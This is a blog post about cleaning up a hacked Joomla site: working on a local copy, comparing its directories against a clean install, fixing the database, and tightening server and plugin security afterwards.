Recovering from a hacked Joomla site

I’ve recently had to help someone still running Joomla to clean up a hacked site. We are not sure how it happened, as they generally applied updates pretty quickly, but luckily it was detected very quickly and brought down to be fixed.

If your site is hacked, consider taking it offline immediately, fixing will not take that long, and if search engines detect the problem, you’ll be taken out of the search results until it’s fixed. Further, you’ll have to get re-listed when you’ve removed the compromised pages.

In addition, this is for the greater good as hacked pages could be full of dangerous payloads, infecting your visitors with mal-ware or viruses. I’m pretty sure that’s not your intention.

At the end of the day, it only takes a day an issue to be found in one of the products. Until that issue is fixed, there is a vector into that system. We decided to move over 90% of our site functions over to Hugo, a static content manager, as there are just far less moving parts.

Determining if a site has been hacked

One of the issues with modern hacking is that it can be difficult to detect, as the hackers do not want you to know they have been there, they often don’t deface instead leaving no trace. Restoring from a backup is only a possibility if it too is not compromised. Restoring to a site backup that is not hacked would obviously be the best solution. However, given what we said earlier this may not be possible, depending on how long ago your site got hacked / compromised.

If a backup is not viable, then at this point you will have to “cleanse” the live version. I recommend you take a backup (SQL and files) of the live site and get it running locally. Be careful visiting the site in a browser, it could compromise your computer. Instead I’d use the unix curl command if you really need to visit the page for some reason.

I’m not going to repeat the good information that’s already available here: Help identifying a hacked site. After going through the instructions on that page, you’ll have a good idea if your site is hacked, and probably even know the affected files. If your site has been hacked check the database as well, any problems there will also need manual attention.

Also take a look at Joomla forum post assistant

Correcting a hacked site

There’s no shortcut here I’m afraid, the only way to cleanse all the files is to start with a clean Joomla install of the same version and compare the directories side by side. I normally use Beyond Compare by Scooter software as that has a really good directory compare tool built into it.

If you were not running the latest version of Joomla, upgrade the locally running hacked installation to the latest version. Do the upgrade manually as documented on the joomla site, do not visit any pages on your site.

Now install clean versions of the plugins into the the clean installation, again if your plugins were out of date, you’ll have to get them up to date in the hacked site first.

Start the directory compare, as the Joomla versions are the same comparision should be quite straightforwards. If you are using beyond compare, set it to show only folders that have differences. Move files into the new installation, only once you know they have not been hacked or compromised. Once complete, run a virus checker on the site.

Now make sure you correct any issues in the database as per the above post, they may well have gained access and hacked or compromised that too. It may be easier to fix the SQL export you took earlier when doing a backup, as you can search for similar terms as before directly in the sql export file.

At this point you should be able to replace your hacked version with the newly created site. Firstly, test it locally or on a test domain to ensure it’s working properly; then once complete, entirely remove the current production version and copy over the new one.

Trying to improve your security

Read this as how to reduce the chances of it happening again. It’s worth going through your security measures and making sure they are enough. Here’s a few questions for starters:

• If you are running on dedicated / VPS hardware, check over and secure your server
• Did this happen because the server and Joomla were well out of date? Keep Linux, Apache and any other installed software up to date.
• Are all the plugins that are installed up to date and valid? Some plugins get marked as bad on the Joomla extensions site, so check yours against there. Personally, I try and keep plugin use to a minimum and look to see if it is being actively maintained.
• Is it possible that the password was compromised because you had used the same one as somewhere else?
• Is the PC/Mac/Linux device you maintain the site from secure? I recommend a good virus checker.
• Remove any empty index.html pages as they are not needed, instead turn off directory browsing in your apache configuration. If you are hacked these files often get filled with dangerous payloads.

If you continue to use Joomla, take a look at the Joomla security page.